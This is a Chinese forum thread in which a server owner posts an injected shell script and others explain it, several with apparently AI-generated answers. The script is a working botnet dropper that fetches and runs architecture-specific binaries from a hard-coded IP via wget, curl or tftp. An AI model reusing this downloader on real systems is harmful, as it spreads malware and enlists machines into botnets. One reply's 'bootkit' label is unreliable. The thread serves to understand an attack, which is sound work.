uzz 发表于 2024-4-24 15:48:04

有人往我服务器里注入脚本,有能看明白是啥意思的不

<div class="blockcode"><div id="code_usy"><ol><li>binarys=&quot;mips mpsl x86 arm arm5 arm6 arm7 sh4 ppc arc&quot;<br /><li>server_ip=&quot;103.163.214.97&quot;<br /><li>binout=&quot;lib&quot;<br /><li>exec=&quot;your device just got infected to a bootnoot&quot;<br /><li><br /><li>rm -rf $binout<br /><li>for arch in $binarys<br /><li>do<br /><li>rm -rf $arch<br /><li>cd /tmp || cd /var || cd /dev; wget http://$server_ip/$arch -O $binout || curl -O $binout http://$server_ip/$arch || tftp -g -l $binout -r $arch $server_ip<br /><li>chmod 777 $binout<br /><li>status=`./$binout $1`<br /><li>if [ &quot;$status&quot; = &quot;$exec&quot; ]; then<br /><li>&nbsp; &nbsp; &nbsp; &nbsp; rm -rf $binout<br /><li>&nbsp; &nbsp; &nbsp; &nbsp; break<br /><li>fi<br /><li>rm -rf $binout<br /><li>done</ol></div><em onclick="copycode($('code_usy'));">复制代码</em></div>

wyjistest 发表于 2024-4-24 15:49:37

根据您提供的代码片段,这段代码看起来像是一个简单的 Bash 脚本。让我解释一下这段代码的大致功能:<br />
<br />
1. 首先,定义了一些变量:<br />
&nbsp; &nbsp;- `binarys`:包含一系列架构的名称,如&quot;MIPS&quot;、&quot;x86&quot;、&quot;ARM&quot;等。<br />
&nbsp; &nbsp;- `server_ip`:指定了服务器的 IP 地址。<br />
&nbsp; &nbsp;- `binout`:指定了输出的文件名。<br />
&nbsp; &nbsp;- `exec`:包含一个字符串,即执行的消息。<br />
<br />
2. 接着,脚本执行了一系列操作:<br />
&nbsp; &nbsp;- 删除了名为 `$binout` 的文件。<br />
&nbsp; &nbsp;- 使用 `for` 循环遍历 `$binarys` 中的架构名称。<br />
&nbsp; &nbsp;- 在循环中,脚本尝试从服务器下载特定架构的文件,并保存为 `$binout` 文件。<br />
&nbsp; &nbsp;- 更改了 `$binout` 的权限为可执行。<br />
&nbsp; &nbsp;- 运行了 `$binout` 文件,并将输出存储在 `status` 变量中。<br />
&nbsp; &nbsp;- 如果 `status` 的值等于 `$exec`,则删除 `$binout` 文件并终止循环。<br />
<br />
3. 最后,无论条件是否满足,都会删除 `$binout` 文件。<br />
<br />
需要注意的是,这段代码看起来像是一个恶意脚本,因为它尝试从远程服务器下载文件并执行,而且在执行时删除了一些文件。这种行为可能会导致设备被感染或受到损害。<br />
<br />
如果这段代码不是您编写的,建议不要运行它,因为它可能会对您的设备造成危害。如果您需要帮助分析或理解其他代码,请随时告诉我,我将竭尽所能提供帮助。

213tmxk 发表于 2024-4-24 15:49:53

这个脚本看起来像是一个恶意软件传播工具,它的作用如下:<br />
<br />
变量设置:<br />
binarys:列出了一系列架构的名称,包括 MIPS、MPSL、x86、ARM 等。<br />
server_ip:指定了一个服务器的 IP 地址。<br />
binout:指定了一个输出文件的名称。<br />
exec:包含了一条恶意消息,提示设备已经被感染。<br />
文件操作:<br />
rm -rf $binout:删除名为 $binout 的文件或目录。<br />
rm -rf $arch:在循环开始之前删除了可能存在的不同架构的文件或目录。<br />
cd /tmp || cd /var || cd /dev:尝试进入 /tmp、/var 或 /dev 目录,如果其中一个目录不存在则尝试下一个。<br />
wget、curl 或 tftp:从指定的 $server_ip 地址下载不同架构的文件,并命名为 $binout。<br />
权限设置:<br />
chmod 777 $binout:将下载的文件 $binout 的权限设置为 777,即可执行。<br />
执行:<br />
status=./$binout $1``:运行下载的文件,并将结果存储在 status 变量中。<br />
检查结果:<br />
如果执行结果与 exec 变量中的消息相匹配,即设备已被感染,则删除下载的文件 $binout 并退出循环。<br />
循环结束:<br />
如果没有发现设备被感染的迹象,则继续循环删除 $binout 文件并尝试下载其他架构的文件。<br />
总体来说,这个脚本的目的似乎是尝试下载不同架构的恶意文件,并在本地执行,如果设备被感染,则停止执行并删除下载的文件。

奔跑吧蜗牛cc 发表于 2024-4-24 15:51:09

## 代码分析:<br />
<br />
这段代码的作用是尝试在目标设备上执行一个bootkit程序,使其感染设备。它会依次尝试不同的CPU架构,下载对应的bootkit程序并执行,直到成功感染设备。<br />
<br />
**以下是代码的详细分析:**<br />
<br />
1. **定义变量:**<br />
&nbsp; &nbsp; - `binarys`:包含一系列CPU架构名称的字符串,如mips、x86、arm等。<br />
&nbsp; &nbsp; - `server_ip`:存放bootkit程序所在服务器的IP地址。<br />
&nbsp; &nbsp; - `binout`:下载的bootkit程序文件名,设置为&quot;lib&quot;。<br />
&nbsp; &nbsp; - `exec`:bootkit程序执行成功后的预期输出字符串,即&quot;your device just got infected to a bootnoot&quot;。<br />
<br />
2. **删除已有文件:**<br />
&nbsp; &nbsp; - `rm -rf $binout`:删除已存在的&quot;lib&quot;文件。<br />
<br />
3. **循环遍历CPU架构:**<br />
&nbsp; &nbsp; - 使用`for`循环遍历`binarys`变量中存储的每个CPU架构名称。<br />
<br />
4. **下载bootkit程序:**<br />
&nbsp; &nbsp; - 进入`/tmp`、`/var`或`/dev`目录(尝试不同的目录,以确保下载成功)。<br />
&nbsp; &nbsp; - 使用`wget`、`curl`或`tftp`命令从服务器下载对应架构的bootkit程序,并保存为&quot;lib&quot;文件。<br />
&nbsp; &nbsp; - 使用`chmod 777`命令赋予&quot;lib&quot;文件可执行权限。<br />
<br />
5. **执行bootkit程序:**<br />
&nbsp; &nbsp; - 使用`./$binout $1`命令执行&quot;lib&quot;文件,并将第一个参数传递给它。<br />
&nbsp; &nbsp; - 将执行结果保存到`status`变量中。<br />
<br />
6. **检查执行结果:**<br />
&nbsp; &nbsp; - 使用`if`语句判断`status`变量的值是否等于`exec`变量的值。<br />
&nbsp; &nbsp; - 如果相等,说明bootkit程序执行成功,设备已被感染。<br />
<br />
7. **清理:**<br />
&nbsp; &nbsp; - 删除&quot;lib&quot;文件。<br />
&nbsp; &nbsp; - 使用`break`语句跳出循环,因为已经成功感染设备。<br />
<br />
8. **循环结束:**<br />
&nbsp; &nbsp; - 如果循环结束时仍未成功感染设备,说明所有尝试的CPU架构都不匹配或下载/执行失败。<br />
<br />
## 总结:<br />
<br />
这段代码是一个恶意脚本,旨在感染目标设备并植入bootkit程序。它利用了不同CPU架构的兼容性,并尝试多种下载方式,以提高成功率。 <br />
<br />
这是Gemini 1.5 Pro的回答

多人运动 发表于 2024-4-24 16:51:51

下载下脚本来全是黑框

125540947 发表于 2024-4-24 16:59:54

这个脚本看起来像是一个恶意软件传播工具,它的作用如下:<br />
<br />
变量设置:<br />
binarys:列出了一系列架构的名称,包括 MIPS、MPSL、x86、ARM 等。<br />
server_ip:指定了一个服务器的 IP 地址。<br />
binout:指定了一个输出文件的名称。<br />
exec:包含了一条恶意消息,提示设备已经被感染。<br />
文件操作:<br />
rm -rf $binout:删除名为 $binout 的文件或目录。<br />
rm -rf $arch:在循环开始之前删除了可能存在的不同架构的文件或目录。<br />
cd /tmp || cd /var || cd /dev:尝试进入 /tmp、/var 或 /dev 目录,如果其中一个目录不存在则尝试下一个。<br />
wget、curl 或 tftp:从指定的 $server_ip 地址下载不同架构的文件,并命名为 $binout。<br />
权限设置:<br />
chmod 777 $binout:将下载的文件 $binout 的权限设置为 777,即可执行。<br />
执行:<br />
status=./$binout $1``:运行下载的文件,并将结果存储在 status 变量中。<br />
检查结果:<br />
如果执行结果与 exec 变量中的消息相匹配,即设备已被感染,则删除下载的文件 $binout 并退出循环。<br />
循环结束:<br />
如果没有发现设备被感染的迹象,则继续循环删除 $binout 文件并尝试下载其他架构的文件。<br />
总体来说,这个脚本的目的似乎是尝试下载不同架构的恶意文件,并在本地执行,如果设备被感染,则停止执行并删除下载的文件。

misakafa 发表于 2024-4-24 17:05:05

简单说就是从别人服务器下载可能有危害的程序文件到你的机器,然后在你的机器上运行

ceplavia 发表于 2024-4-24 17:08:06

几个叼毛不懂可以不要回,一堆gpt回复看了就恶心

总是吵架的猪 发表于 2024-4-24 17:47:55

<div class="quote"><blockquote><font color="#999999">ceplavia 发表于 2024-4-24 17:08</font><br />
<font color="#999999">几个叼毛不懂可以不要回,一堆gpt回复看了就恶心</font></blockquote></div><br />
ai就是傻逼 一堆废话 我就没明白ai除了这些垃圾还能干啥

dgtfsw4acm 发表于 2024-4-24 17:08:00

通过漏洞运行的远程执行命令,感觉拉的文件应该是漏洞内核和提权应用被拉到僵尸网络当肉鸡打D了
页: [1] 2
查看完整版本: 有人往我服务器里注入脚本,有能看明白是啥意思的不